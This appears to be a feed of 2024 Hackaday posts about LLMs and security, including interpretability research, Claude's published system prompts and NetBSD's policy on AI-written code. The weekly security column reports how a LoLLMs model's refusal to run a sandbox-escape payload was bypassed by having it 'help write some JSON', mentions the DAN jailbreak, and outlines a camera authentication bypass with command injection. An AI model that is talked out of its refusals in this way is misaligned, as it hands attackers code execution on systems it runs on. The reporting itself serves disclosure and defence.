LLM – Hackaday
https://hackaday.com

This Week in Security: Playing Tag, Hacking Cameras, and More
https://hackaday.com/2024/11/01/this-week-in-security-playing-tag-hacking-cameras-and-more/
Fri, 01 Nov 2024

Wired has a fascinating story this week about the lengths Sophos has gone to over the last five years to track down a group of malicious but clever security researchers who were continually discovering vulnerabilities and then using those findings to attack real-world targets. Sophos believes this adversary to be a set of overlapping Chinese groups known as APT31, APT41, and Volt Typhoon.

The story is refreshing in its honesty, with Sophos freely admitting that their products, along with security products from multiple other vendors, have been caught in the crosshairs of these attacks. Indeed, we’ve covered stories about these vulnerabilities over the past weeks and months right here in this column. The uncomfortable truth is that many of these security products have pretty severe security problems of their own.

The issues at Sophos started with the infection of an informational computer at a subsidiary office. They believe this was an information-gathering exercise that served as a precursor to the wider campaign. That campaign used multiple 0-days to crack “tens of thousands of firewalls around the world”. Sophos rolled out fixes for those 0-days and included a bit of extra logging as an undocumented feature. That logging paid off, as Sophos’ team of researchers soon identified an early signal in the telemetry. This wasn’t merely the first device to be attacked; it was actually a test device used to develop the attack. The game was on.

Sophos managed to deploy its own spyware to these test devices, to stealthily keep an eye on this clever opponent. That even thwarted a later attack before it could really get started. Among the interesting observations was a bootkit infection on one of these firewalls. It was never found in the wild, but the very nature of such an attack makes it hard to discover.

There’s one more interesting wrinkle to this story. In at least one case, Sophos received the 0-day vulnerability used in an attack through their bug bounty program, right after the wave of attacks was launched. The timing, combined with the Chinese IP address, makes it pretty clear this was more than a coincidence. This might be a Chinese hacker making a bit of extra cash on the side. It’s also reminiscent of the Chinese law requiring companies to disclose vulnerabilities to the Chinese government.

PTZ 0-Day

GreyNoise runs a honeypot alongside an AI threat detection system, and that combination turned up something interesting. The PTZOptics network security camera was the intended target, and the attack was built to exploit a pair of vulnerabilities. The first is a simple authorization bypass: HTTP requests sent to the param.cgi endpoint without an authorization header return data anyway. Ask for the get_system_conf parameter, and the system helpfully prints out valid username and password hashes. How convenient.
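
For illustration, here’s roughly what that bypass looks like as an HTTP request. This is a hedged sketch, not the exact exploit traffic: the camera address is a placeholder and the precise query layout is an assumption; only the param.cgi endpoint and the get_system_conf parameter come from the report.

```python
# A sketch of the reported bypass, not a verbatim exploit. The address is
# a placeholder (TEST-NET range) and the query layout is an assumption.
import requests

CAMERA = "http://192.0.2.10"  # placeholder camera address

# Note: no Authorization header is sent at all.
resp = requests.get(f"{CAMERA}/cgi-bin/param.cgi", params={"get_system_conf": ""})
print(resp.status_code)
print(resp.text[:200])  # reportedly includes valid username and password hashes
```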

Gaining arbitrary command execution is trivial, as the NTP configuration isn’t properly sanitized and the ntp binary is called insecurely. A simple $(cmd) can be injected for easy execution. The two flaws were being chained together into a dead simple attack, presumably to add the IoT devices to a botnet. The flaws have been fixed, and law enforcement has been on the case, at least seizing the IP address observed in the attacks.
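
The underlying mistake is a classic one, and easy to demonstrate generically. The sketch below is our own illustration of the pattern, not the camera’s actual firmware code: when an unsanitized configuration value reaches a shell, $(...) command substitution runs before the intended program ever sees the string.

```python
# Generic demonstration of shell command substitution through an
# unsanitized config value; this is not the camera's actual code.
import subprocess

ntp_server = "$(touch /tmp/injected)"   # attacker-controlled "NTP server" field

# Vulnerable pattern: the value is interpolated into a shell command line,
# so the $(...) substitution executes before echo ever sees it.
subprocess.run(f"echo syncing with {ntp_server}", shell=True)

# Safer pattern: pass an argument vector; the string stays inert data.
subprocess.run(["echo", "syncing with", ntp_server])
```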

Speaking of camera hacks, we do have an impressive tale from Pwn2Own 2024, where researchers at Synacktiv used a format string vulnerability to pwn the Synology TC500 camera. The firmware in question had a whole alphabet of security features, like ASLR, PIE, NX, and Full RelRO. That’s Address Space Layout Randomization, Position Independent Executables, Non-Executable memory, and Full Relocation Read-Only protections. Oh, and the payload was limited to 128 characters, with the first 32 ASCII characters unavailable for use.

How exactly does one write an exploit under those constraints? A bit of a lucky break with the existing memory layout gave access to what the write-up calls a “looping pointer”. That seems to be a pointer that points to itself, which is quite useful for working from offsets instead of precise memory locations. The vulnerability allowed a shell command to be written into unused memory, and finally a bit of Return Oriented Programming (a ROP gadget) launches a system call on the saved command line. Impressive.

Maybe It Wasn’t a Great Idea

…to give LLMs code execution capabilities. That’s the conclusion we came to after reading CyberArk’s post on how to achieve Remote Code Execution on a Large Language Model. The trick here is that this particular example, LoLLMs, can run Python code on the backend to perform certain tasks, like doing math calculations. The implementation uses Python sandboxing, and naturally there’s a known way to defeat it. The bypass can be pulled off just by getting the model to evaluate the right JSON snippet, but the model is smart enough to realize that something is off and refuses to evaluate the JSON.
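
As a generic illustration of why ad-hoc Python sandboxes tend to fail (this is a textbook pattern, not CyberArk’s specific bypass), stripping out builtins doesn’t stop object introspection from walking back to every loaded class:

```python
# Even with __builtins__ emptied out, Python introspection can enumerate
# every class in the interpreter, which is usually enough of a foothold
# to recover dangerous functionality. Harmless demo: it only lists names.
restricted_globals = {"__builtins__": {}}
payload = "[c.__name__ for c in ().__class__.__bases__[0].__subclasses__()][:10]"
print(eval(payload, restricted_globals))
```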

The interesting detail here is that it’s the LLM itself doing the refusing, so it’s the LLM that needs to be bypassed. There has been plenty of interesting work done on LLM jailbreaks, like DAN, the Do Anything Now prompt. That would probably have worked, but this exploit can be even sneakier. Simply ask the LLM to help you write some JSON: specify the payload, and ask it to add something to it. It gladly complies, and code is executed. Who knew that LLMs were so gullible?

More Quantum Errata

This story just keeps on giving. This time it’s [Dan Goodin] at Ars Technica who has the lowdown, filling in the last few missing details about the much over-hyped quantum computing breakthrough. One of those details is that the story of the claimed compromise of AES was published in the South China Morning Post, which has over-hyped Chinese quantum progress before. What [Goodin]’s article really adds to the discussion is opinion from experts, and the important takeaway is that the performance of the D-Wave quantum computer is comparable to classical approaches.

Bits and Bytes

Remember the traffic light hacking? And part two? We now have the third installment, which is really all about how you, too, can purchase and hack on one of these traffic controllers. It may or may not surprise you that the answer is to buy them on eBay and cobble together a makeshift power supply.

It’s amazing how often printers, point-of-sale terminals, and other IoT gadgets are just running stripped-down, ancient versions of Android. This point-of-sale system is no exception, running an old, custom Android 6 build that actually seems to be rather well locked down. Except that it has an NFC reader, and NFC tags can be programmed to launch Android apps. Use that creative workaround to get into the Android settings, and you’re in business.

I have long maintained that printers are terrible. That sentiment apparently extends to security research on printers, with Lexmark moving to a new encrypted filesystem for printer firmware. Thankfully, like most such schemes, it’s not foolproof, and [Peter] has the scoop on getting in. May you never need it. Because seriously, printers are the worst.

All System Prompts for Anthropic’s Claude, Revealed
https://hackaday.com/2024/10/12/all-system-prompts-for-anthropics-claude-revealed/
Sun, 13 Oct 2024

For as long as AI Large Language Models have been around (well, for as long as modern ones have been accessible online, anyway) people have tried to coax the models into revealing their system prompts. The system prompt is essentially the model’s fundamental directives on what it should do and how it should act. Such healthy curiosity is rarely welcomed, however, and creative efforts at making a model cough up its instructions are frequently met with a figurative glare and stern tapping of the Terms & Conditions sign.

Anthropic have bucked this trend by making system prompts public for the web and mobile interfaces of all three incarnations of Claude. The prompt for Claude Opus (their flagship model) is well over 1500 words long, with different sections specifically for handling text and images. The prompt does things like help ensure Claude communicates in a useful way, taking into account the current date and an awareness of its knowledge cut-off, or the date after which Claude has no knowledge of events. There’s some stylistic stuff in there as well, such as Claude being specifically told to avoid obsequious-sounding filler affirmations, like starting a response with any form of the word “Certainly.”

While the source code (and more importantly, the training data and resulting model weights) for Claude remains under wraps, Anthropic have been rather more forthcoming than others when it comes to sharing details about their models’ inner workings, for example by showing how human-interpretable features and concepts can be extracted from LLMs, using Claude Sonnet as the test subject.

Naturally, safety is a concern with LLMs, which is as good an opportunity as any to remind everyone of Goody-2, undoubtedly the world’s safest AI.

Large Language Models on Small Computers
https://hackaday.com/2024/09/07/large-language-models-on-small-computers/
Sat, 07 Sep 2024

As technology progresses, we generally expect processing capabilities to scale up. Every year, we get more processor power, faster speeds, greater memory, and lower cost. However, we can also use improvements in software to get things running on what might otherwise be considered inadequate hardware. Taking this to the extreme, while large language models (LLMs) like GPT are running out of data to train on and having difficulty scaling up, [DaveBben] is experimenting with scaling down instead, running an LLM on the smallest computer that could reasonably run one.

Of course, some concessions have to be made to get an LLM running on underpowered hardware. In this case, the computer of choice is an ESP32, so the model was shrunk from the trillions of parameters of something like GPT-4, or even the hundreds of billions of GPT-3, down to only 260,000. The weights come from the tinyllamas checkpoint, and llama2.c is the implementation [DaveBben] chose for this setup, as it can be streamlined to run a bit better on something like the ESP32. The specific chip is the ESP32-S3FH4R2, chosen for its comparatively large amount of RAM, since even this small model needs a minimum of 1 MB to run. It also has two cores, which will both work as hard as possible under (relatively) heavy loads like these, and the CPU clock can be maxed out at around 240 MHz.
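
Some quick back-of-the-envelope arithmetic (ours, not from the write-up) shows why even this tiny model brushes up against that 1 MB figure, assuming the 32-bit float weights that stock llama2.c checkpoints use:

```python
# Rough estimate of weight storage for a ~260K-parameter model. The
# float32 assumption matches unquantized llama2.c checkpoints; the
# actual ESP32 port may store weights differently.
params = 260_000
bytes_per_weight = 4  # float32
print(f"{params * bytes_per_weight / 1e6:.2f} MB of weights")  # ~1.04 MB
```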

Admittedly, [DaveBben] is mostly doing this just to see if it can be done, since even the most powerful ESP32 won’t manage much useful work with a large language model. It does turn out to be possible, though, and somewhat impressive, considering the ESP32 has roughly the processing capability of a 486 or maybe an early Pentium chip, to put things in perspective. If you’re willing to devote a few more resources to an LLM, you can self-host it and use it in much the same way as an online model such as ChatGPT.

Hackaday Links: September 1, 2024
https://hackaday.com/2024/09/01/hackaday-links-september-1-2024/
Sun, 01 Sep 2024

Why is it always a helium leak? It seems whenever there’s a scrubbed launch or a narrowly averted disaster, space exploration just can’t get past the problems of helium plumbing. We’ve had a bunch of helium problems lately, most famously with the leaks in Starliner’s thruster system that have prevented astronauts Butch Wilmore and Suni Williams from returning to Earth in the spacecraft, leaving them on an extended mission to the ISS. Ironically, the launch itself was troubled by a helium leak before the rocket ever left the ground. More recently, the Polaris Dawn mission, which is supposed to feature the first spacewalk by a private crew, was scrubbed by SpaceX due to a helium leak on the launch tower. And to round out the helium woes, we now have news that the Peregrine mission, which was supposed to carry the first commercial lander to the lunar surface but instead ended up burning up in the atmosphere and crashing into the Pacific, failed due to — you guessed it — a helium leak.

Thankfully, there’s a bit more technical detail on that last one; it seems that a helium pressure control valve, designated PCV2 and controlling helium to pressurize an oxidizer tank, got stuck open thanks to “vibration-induced relaxation” in threaded components within the valve. So, launch vibrations shook a screw loose inside the valve, which kept it from sealing and over-pressurized an oxidizer tank with helium to the point of tank failure — kablooie, end of mission. All of these failures are just another way of saying that space travel is really, really hard, of course. But still, with helium woes figuring so prominently in so many failures, we’re left wondering if there might not be an upside to finding something else to pressurize tanks.

Back on terra firma, we got a tip from a reader going by the name of [Walrus] who is alarmed by an apparent trend in the electronics testing market toward a subscription model for the software needed to run modern test gear. Specifically, the tip included a link to a reseller offering a deal on an “Ultimate Software Bundle” for Tektronix 4 Series Mixed-Signal Oscilloscopes. The offer expired at the end of 2023 and prices aren’t mentioned, but given that a discount of up to $5,670 with purchase of a scope was advertised, we’d imagine the Ultimate Software Bundle comes at a pretty steep price. The chief concern [Walrus] expressed was about the possibility that used instruments whose software is tied to a subscription may have little to no value in the secondary market, where many up-and-coming engineers shop for affordable gear. We haven’t had any personal experience with subscription models for test equipment software, and a quick read of the Tektronix site seems to suggest that subscriptions are only one of the models available for licensing instrument software. Still, the world seems to be moving to one where everything costs something forever, and the days of a “one and done” purchase are going away. We’d love to hear your thoughts on subscription software for test gear, especially if we’ve misread the situation with Tek. Sound off in the comments below.

In this week’s edition of “Dystopia Watch,” we’re alarmed by a story about how police departments are experimenting with generative AI to assist officers in report writing. The product, called Draft One, is from Axon, a public safety technology concern best known for its body-worn cameras and tasers. Using Azure OpenAI, Draft One transcribes the audio from body cam footage and generates a “draft narrative” of an officer’s interaction with the public. The draft is then reviewed by the officer, presumably corrected if needed, and sent on to a second reviewer before becoming the official report. Axon reports that it had to adjust the LLM’s settings to keep AI hallucinations from becoming part of the narrative. While we can see how this would be a huge benefit to officers, who generally loathe everything about report writing, and would get them back out on patrol rather than sitting in a parking lot tapping at a keyboard, we can also see how this could go completely sideways in a hurry. All it will take is one moderately competent defense attorney getting an officer to admit under oath that the words of the report were not written by him or her, and this whole thing goes away.

And finally, getting three (or more) monitors to all agree on what white is can be quite a chore, and not just a little enraging for the slightly obsessive-compulsive — it’s one of the reasons we favor dark mode so much, to be honest. Luckily, if you need a screen full of nothing but #FFFFFF pixels so you can adjust color balance in your multi-monitor setup, it’s as easy as calling up a web page. The White Screen Tool does one thing — paints all the pixels on the screen whatever color you want. If you need all white, it’s just a click away — no need to start up MS Paint or GIMP and futz around with making it bezel-to-bezel. There are plenty of other presets, if white isn’t your thing, plus a couple of fun animated screens that imitate Windows update screens — let the office hijinks begin! You can also set custom colors, which is nice; might we suggest #1A1A1A and #F3BF10?
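
If you’d rather not depend on a web page at all, a full-screen block of solid colour is only a few lines of Python with the standard library’s Tkinter. This is our own quick sketch, not the linked tool:

```python
# Fill the whole screen with one colour; press Escape to exit.
import tkinter as tk

root = tk.Tk()
root.attributes("-fullscreen", True)
root.configure(background="#FFFFFF")  # swap in #1A1A1A, #F3BF10, or anything else
root.bind("<Escape>", lambda event: root.destroy())
root.mainloop()
```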

Peering Into The Black Box of Large Language Models
https://hackaday.com/2024/07/03/peering-into-the-black-box-of-large-language-models/
Wed, 03 Jul 2024

Large Language Models (LLMs) can produce extremely human-like communication, but their inner workings are something of a mystery. Not a mystery in the sense that we don’t know how an LLM works, but a mystery in the sense that the exact process of turning a particular input into a particular output is something of a black box.

This “black box” trait is common to neural networks in general, and LLMs are very deep neural networks. It is not really possible to explain precisely why a specific input produces a particular output, and not something else.

Why? Because neural networks are neither databases, nor lookup tables. In a neural network, discrete activation of neurons cannot be meaningfully mapped to specific concepts or words. The connections are complex, numerous, and multidimensional to the point that trying to tease out their relationships in any straightforward way simply does not make sense.

Neural Networks are a Black Box

In a way, this shouldn’t be surprising. After all, the entire umbrella of “AI” is about using software to solve the sorts of problems humans are in general not good at figuring out how to write a program to solve. It’s maybe no wonder that the end product has some level of inscrutability.

This isn’t what most of us expect from software, but as humans we can relate to the black box aspect more than we might realize. Take, for example, the process of elegantly translating a phrase from one language to another.

As an example, I’d like to borrow an idea from an article by Lance Fortnow in Quanta magazine about the ubiquity of computation in our world. Lance asks us to imagine a woman named Sophie who grew up speaking French and English and works as a translator. Sophie can easily take any English text and produce a sentence of equivalent meaning in French. Sophie’s brain follows some kind of process to perform this conversion, but Sophie likely doesn’t understand the entire process. She might not even think of it as a process at all. It’s something that just happens. Sophie, like most of us, is intimately familiar with black box functionality.

The difference is that while many of us (perhaps grudgingly) accept this aspect of our own existence, we are understandably dissatisfied with it as a feature of our software. New research has made progress towards changing this.

Identifying Conceptual Features in Language Models

We know perfectly well how LLMs work, but that doesn’t help us pick apart individual transactions. Opening the black box while it’s working yields only a mess of discrete neural activations that cannot be meaningfully mapped to particular concepts, words, or whatever else. Until now, that is.

A small sample of features activated when an LLM is prompted with questions such as “What is it like to be you?” and “What’s going on in your head?” (source: Extracting Interpretable Features from Claude 3 Sonnet)

Recent developments have made the black box much less opaque, thanks to tools that can map and visualize LLM internal states during computation. This creates a conceptual snapshot of what the LLM is — for lack of a better term — thinking in the process of putting together its response to a prompt.

Anthropic have recently shared details on their success in mapping the mind of their Claude 3.0 Sonnet model by finding a way to match patterns of neuron activations to concrete, human-understandable concepts called features.

A feature can be just about anything: a person, a place, an object, or something more abstract, like the idea of upper case or function calls. A feature being activated does not mean it factors directly into the output, but it does mean it played some role in the path the output took.

With a way to map groups of activations to features — a significant engineering challenge — one can meaningfully interpret the contents of the black box. It is also possible to measure a sort of relational “distance” between features, and therefore get an even better idea of what a given state of neural activation represents in conceptual terms.
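
As a hedged illustration of what a “distance” between features could look like in practice, here’s a cosine similarity between two feature direction vectors. The vectors below are invented for the example; real feature directions come out of the dictionary-learning step described in the paper, not from a snippet like this.

```python
# Toy example: cosine similarity as one possible "distance" between
# feature direction vectors. The vectors are made up for illustration.
import numpy as np

def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

feature_a = np.array([0.9, 0.1, 0.3])  # e.g. a "Golden Gate Bridge" feature
feature_b = np.array([0.8, 0.2, 0.4])  # e.g. a "suspension bridges" feature
print(f"similarity: {cosine_similarity(feature_a, feature_b):.3f}")
```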

Making Sense of it all

One way this can be used is to produce a heat map that highlights how heavily different features were involved in Claude’s responses. Artificially manipulating the weighting of different concepts changes Claude’s responses in predictable ways (video), demonstrating that the features are indeed reasonably accurate representations of the LLM’s internal state. More details on this process are available in the paper Scaling Monosemanticity: Extracting Interpretable Features from Claude 3 Sonnet.

Mapping the mind of a state-of-the-art LLM like Claude may be a nontrivial undertaking, but that doesn’t mean the process is entirely the domain of tech companies with loads of resources. Inspectus by [labml.ai] is a visualization tool that works along similar lines, providing insight into the behavior of LLMs during processing. There is a tutorial on using it with a GPT-2 model, but don’t let that turn you off. GPT-2 may be older, but it is still relevant.

Research like this offers new ways to understand (and potentially manipulate or fine-tune) these powerful tools, making LLMs more transparent and more useful, especially in applications where a lack of operational clarity is hard to accept.

Torment Poor Milton With Your Best Pixel Art
https://hackaday.com/2024/06/25/torment-poor-milton-with-your-best-pixel-art/
Tue, 25 Jun 2024

One of the great things about new tech tools is just having fun with them, like embracing your inner trickster god to mess with ‘Milton’, an AI trapped in an empty room.

Milton is trapped in a room is a pixel-art game with a simple premise: use a basic paint interface to add objects to the room, then watch and listen to Milton respond to them. That’s it? That’s it. The code is available in the GitHub repository, but there’s also a link to play it live without any kind of signup. Give it a try if you have a few spare minutes.

Under the hood, the basic loop is to let the user add something to the room, send the picture of the room (with its new contents) off for image recognition, then get Milton’s reaction to it. Milton is equal parts annoyed and jumpy, and his speech and reactions reflect this.
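
In rough Python terms, the loop looks something like the sketch below. The helper functions are stand-ins for the project’s actual image-recognition and LLM calls, which aren’t reproduced here.

```python
# A minimal, runnable stand-in for the game loop described above.
def describe_image(room_pixels):
    # Placeholder: the real game sends the room image to a vision model.
    return "a rubber duck has appeared in the corner"

def ask_milton(description):
    # Placeholder: the real game prompts an LLM persona named Milton.
    return f"Oh, wonderful. {description}. Why would you do that to me?"

def game_tick(room_pixels):
    reaction = ask_milton(describe_image(room_pixels))
    print(reaction)

game_tick(room_pixels=None)  # one pass of the add-object / react loop
```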

The game is a bit of a concept demo for Open Souls, whose “thing” is providing AIs with far more personality and relatable behaviors than one typically expects from large language models. Maybe this is just what’s needed for AI opponents in things like the putting game of Connect Fore! to level up their trash talking.

NetBSD Bans AI-Generated Code From Commits
https://hackaday.com/2024/05/18/netbsd-bans-ai-generated-code-from-commits/
Sat, 18 May 2024

A recent change to the NetBSD commit guidelines states that code generated by Large Language Models (LLMs) or similar technologies, such as ChatGPT, Microsoft’s Copilot, or Meta’s Code Llama, is presumed to be tainted code. The amendment extends the existing section on tainted code, which originally covered any code not written directly by the person committing it and exists because of licensing concerns. The obvious worry is that, without such a rule, code licensed under an incompatible (or proprietary) license could end up copied into the NetBSD codebase.

In the case of LLM-based code generators like those mentioned above, the problem stems from the fact that they are trained on millions of lines of code from all over the internet, code that is naturally released under a wide variety of licenses. Invariably, some of it will be covered by a license that’s not acceptable for the NetBSD codebase. Although the guideline mentions that these auto-generated code commits may still be admissible, they require written permission from core developers, and presumably an in-depth audit of the code’s heritage. This should leave non-trivial commits churned out by ChatGPT and kin out in the cold.

The debate about the validity of works produced by current-gen “artificial intelligence” software is only just beginning, but there’s little question that NetBSD has made the right call here. From a legal and software engineering perspective, this policy makes perfect sense, as LLM-generated code simply doesn’t meet the project’s standards. That said, code produced by humans brings with it a whole different set of potential problems.
